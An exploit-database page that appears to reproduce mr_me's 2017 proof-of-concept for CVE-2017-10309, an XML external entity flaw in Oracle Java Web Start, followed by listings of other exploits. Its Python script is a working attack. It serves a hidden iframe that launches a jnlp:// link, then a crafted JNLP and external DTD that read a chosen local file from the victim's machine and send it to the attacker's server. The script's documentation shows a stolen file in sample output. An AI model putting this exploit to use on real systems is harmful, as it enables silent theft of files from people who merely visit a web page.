"Oracle Java SE - Web Start jnlp XML External Entity Processing Information Disclosure"

Author

Exploit author

mr_me

Platform

Exploit platform

xml

Release date

Exploit published date

2017-10-30

                
                    
                         Download file
                    
                
            
#!/usr/local/bin/python
"""
Oracle Java SE Web Start jnlp XML External Entity Processing Information Disclosure Vulnerability
Affected:   <= v8u131
File:       jre-8u131-windows-i586-iftw.exe
SHA1:       85f0de19845deef89cc5a29edebe5bb33023062d
Download:   http://www.oracle.com/technetwork/java/javase/downloads/jre8-downloads-2133155.html
References: SRC-2017-0028 / CVE-2017-10309
Advisory:   http://srcincite.io/advisories/src-2017-0028/

Vulnerability Details:
======================

Java SE installs a protocol handler in the registry as "HKEY_CLASSES_ROOT\jnlp\Shell\Open\Command\Default" 'C:\Program Files\Java\jre1.8.0_131\bin\jp2launcher.exe" -securejws "%1"'. 
This can allow allow an attacker to launch remote jnlp files with little user interaction. A malicious jnlp file containing a crafted XML XXE attack to be leveraged to disclose files, cause a denial of service or trigger SSRF.

Notes:
======

- It will take a few seconds to fire.
- Some browsers will give a small, innocent looking popup (not a security alert), but IE/Edge doesn't at all.

Example:
========

saturn:~ mr_me$ ./poc.py 

    Oracle Java Web Start JNLP XML External Entity Processing Information Disclosure Vulnerability
    mr_me 2017

(+) usage: ./poc.py <file>
(+) eg: ./poc.py 'C:/Program Files/Java/jre1.8.0_131/README.txt'

saturn:~ mr_me$ ./poc.py 'C:/Program Files/Java/jre1.8.0_131/README.txt'

    Oracle Java Web Start JNLP XML External Entity Processing Information Disclosure Vulnerability
    mr_me 2017

(+) select your interface: lo0, gif0, stf0, en0, en1, en2, bridge0, p2p0, awdl0, vmnet1, vmnet8, tap0: vmnet8
(+) starting xxe server...
(+) have someone with Java SE installed visit: http://172.16.175.1:9090/
(!) firing webstart...
(!) downloading jnlp...
(!) downloading si.xml...
(+) stolen: Please%20refer%20to%20http://java.com/licensereadme
^C(+) shutting down the web server
saturn:~ mr_me$
"""

import sys
import socket
import fcntl
import struct
from random import choice
from string import lowercase
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler

try:
    import netifaces as ni
except:
    print "(-) try 'pip install netifaces'"
    sys.exit(1)

class xxe(BaseHTTPRequestHandler):

    # stfu
    def log_message(self, format, *args):
        return

    def do_GET(self):

        if "leaked" in self.path:
            print "(+) stolen: %s" % self.path.split("?")[1]
            self.send_response(200)
            self.end_headers()

        elif self.path == "/":
            print "(!) firing webstart..."
            self.send_response(200)
            self.end_headers()
            message = """
            <html>
            <body>
            <iframe src="jnlp://%s:9090/%s" style="width:0;height:0;border:0; border:none;"></iframe>
            </body>
            </html>
            """ % (ip, path)
            self.wfile.write(message)
            self.wfile.write('\n')

        elif "si.xml" in self.path:
            print "(!) downloading si.xml..."
            self.send_response(200)
            self.end_headers()
            message = """
            <!ENTITY %% data SYSTEM "file:///%s">
            <!ENTITY %% param1 "<!ENTITY &#x25; exfil SYSTEM 'http://%s:9090/leaked?%%data;'>">
            """ % (file, ip)
            self.wfile.write(message)
            self.wfile.write('\n')

        elif path in self.path:
            print "(!) downloading jnlp..."
            self.send_response(200)
            self.end_headers()
            message = """
            <?xml version="1.0" ?>
            <!DOCTYPE r [
            <!ELEMENT r ANY >
            <!ENTITY %% sp SYSTEM "http://%s:9090/si.xml">
            %%sp;
            %%param1;
            %%exfil;
            ]>
            """ % ip
            self.wfile.write(message)
            self.wfile.write('\n')
        return

def banner():
    return """\n\tOracle Java Web Start JNLP XML External Entity Processing Information Disclosure Vulnerability\n\tmr_me 2017\n"""

if __name__ == '__main__':

    print banner()

    if len(sys.argv) != 2:
        print "(+) usage: %s <file>" % sys.argv[0]
        print "(+) eg: %s 'C:/Program Files/Java/jre1.8.0_131/README.txt'" % sys.argv[0]
        sys.exit(1)

    file = sys.argv[1]

    # randomize incase we change payloads and browser caches
    path  = "".join(choice(lowercase) for i in range(10))
    path += ".jnlp"

    # interfaces
    ints = ""
    for i in ni.interfaces(): ints += "%s, " % i
    interface = raw_input("(+) select your interface: %s: " % ints[:-2])

    # get the ip from the interface
    try:
        ip = ni.ifaddresses(interface)[2][0]['addr']
    except:
        print "(-) no ip address associated with that interface!"
        sys.exit(1)
    print "jnlp://%s:9090/%s" % (ip, path)
    try:
        server = HTTPServer(('0.0.0.0', 9090), xxe)
        print '(+) starting xxe server...'
        print '(+) have someone with Java SE installed visit: http://%s:9090/' % ip
        server.serve_forever()

    except KeyboardInterrupt:
        print '(+) shutting down the web server'
        server.socket.close()

Release Date	Title	Type	Platform	Author
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"

Release Date	Title	Type	Platform	Author
2020-07-07	"Microsoft Windows mshta.exe 2019 - XML External Entity Injection"	remote	xml	hyp3rlinx
2020-05-05	"BlogEngine 3.3 - 'syndication.axd' XML External Entity Injection"	webapps	xml	"Daniel Martinez Adan"
2020-02-07	"ExpertGPS 6.38 - XML External Entity Injection"	webapps	xml	"Trent Gordon"
2020-01-22	"Citrix XenMobile Server 10.8 - XML External Entity Injection"	webapps	xml	"Jonas Lejon"
2020-01-20	"Easy XML Editor 1.7.8 - XML External Entity Injection"	local	xml	"Javier Olmedo"
2020-01-09	"MSN Password Recovery 1.30 - XML External Entity Injection"	local	xml	ZwX
2019-12-04	"Microsoft Visual Basic 2010 Express - XML External Entity Injection"	local	xml	ZwX
2019-12-03	"Microsoft Windows Media Center 2002 - XML External Entity MotW Bypass"	local	xml	hyp3rlinx
2019-12-02	"Visual Studio 2008 - XML External Entity Injection"	local	xml	hyp3rlinx
2019-12-02	"Microsoft Excel 2016 1901 - XML External Entity Injection"	local	xml	hyp3rlinx

Release Date	Title	Type	Platform	Author
2020-02-06	"Cisco Data Center Network Manager 11.2 - Remote Code Execution"	webapps	java	mr_me
2020-02-06	"Cisco Data Center Network Manager 11.2.1 - 'LanFabricImpl' Command Injection"	webapps	java	mr_me
2020-02-06	"Cisco Data Center Network Manager 11.2.1 - 'getVmHostData' SQL Injection"	webapps	java	mr_me
2019-12-12	"ManageEngine Desktop Central - 'FileStorage getChartImage' Deserialization / Unauthenticated Remote Code Execution"	webapps	multiple	mr_me
2019-05-17	"Cisco Prime Infrastructure Health Monitor HA TarArchive - Directory Traversal / Remote Code Execution"	remote	linux	mr_me
2018-08-20	"Easylogin Pro 1.3.0 - 'Encryptor.php' Unserialize Remote Code Execution"	remote	php	mr_me
2018-06-25	"Foxit Reader 9.0.1.1049 - Remote Code Execution"	remote	windows	mr_me
2018-01-28	"Trend Micro Threat Discovery Appliance 2.6.1062r1 - 'dlp_policy_upload.cgi' Remote Code Execution"	remote	linux	mr_me
2018-01-15	"Synology Photo Station 6.8.2-3461 - 'SYNOPHOTO_Flickr_MultiUpload' Race Condition File Write Remote Code Execution"	remote	hardware	mr_me
2018-01-03	"Kingsoft Antivirus/Internet Security 9+ - Local Privilege Escalation"	local	windows	mr_me
2017-10-30	"Oracle Java SE - Web Start jnlp XML External Entity Processing Information Disclosure"	webapps	xml	mr_me
2017-09-12	"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Local Privilege Escalation (2)"	local	windows	mr_me
2017-09-06	"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Out-of-Bounds Write Privilege Escalation"	local	windows	mr_me
2017-09-06	"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Local Privilege Escalation (1)"	local	windows	mr_me
2017-07-05	"Lepide Auditor Suite - 'createdb()' Web Console Database Injection / Remote Code Execution"	remote	php	mr_me
2016-05-09	"Dell SonicWALL Scrutinizer 11.0.1 - setUserSkin/deleteTab SQL Injection Remote Code Execution"	remote	windows	mr_me
2016-03-28	"Cogent Datahub 7.3.9 Gamma Script - Local Privilege Escalation"	local	windows	mr_me
2016-03-07	"ATutor LMS - '/install_modules.php' Cross-Site Request Forgery / Remote Code Execution"	webapps	php	mr_me
2012-06-15	"Useresponse 1.0.2 - Privilege Escalation / Remote Code Execution"	webapps	php	mr_me
2012-06-14	"XM Easy Personal FTP Server 5.30 - Remote Format String Write4"	remote	windows	mr_me
2011-12-23	"Open Conference/Journal/Harvester Systems 2.3.x - Multiple Remote Code Execution Vulnerabilities"	webapps	php	mr_me
2011-12-09	"Docebo Lms 4.0.4 - 'Messages' Remote Code Execution"	webapps	php	mr_me
2011-12-04	"Family Connections CMS 2.5.0/2.7.1 - 'less.php' Remote Command Execution"	webapps	php	mr_me
2011-09-22	"Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow"	remote	windows	mr_me
2011-09-12	"ScadaTEC ModbusTagServer & ScadaPhone - '.zip' Local Buffer Overflow"	local	windows	mr_me
2011-07-31	"Actfax FTP Server 4.27 - 'USER' Stack Buffer Overflow (Metasploit)"	remote	windows	mr_me
2011-06-20	"Black Ice Cover Page SDK - Insecure Method 'DownloadImageFileURL()' (Metasploit)"	remote	windows	mr_me
2011-06-20	"Black Ice Fax Voice SDK 12.6 - Remote Code Execution"	remote	windows	mr_me
2011-03-11	"Linux NTP query client 4.2.6p1 - Heap Overflow"	dos	linux	mr_me
2011-03-09	"Maian Weblog 4.0 - Blind SQL Injection"	webapps	php	mr_me

import requests

response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Whatweb

Dns lookup

Raccoon scanner

Cmseek

WAF detector

DNS reconnaince

Bing IP2Host

Wappalyzer

Waybackurl

HostHunter

WPScan

Apache Users

CORS Scanner

API Docs

ReDoc

OpenAPI

Swagger

Search for hundreds of thousands of exploits

"Oracle Java SE - Web Start jnlp XML External Entity Processing Information Disclosure"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.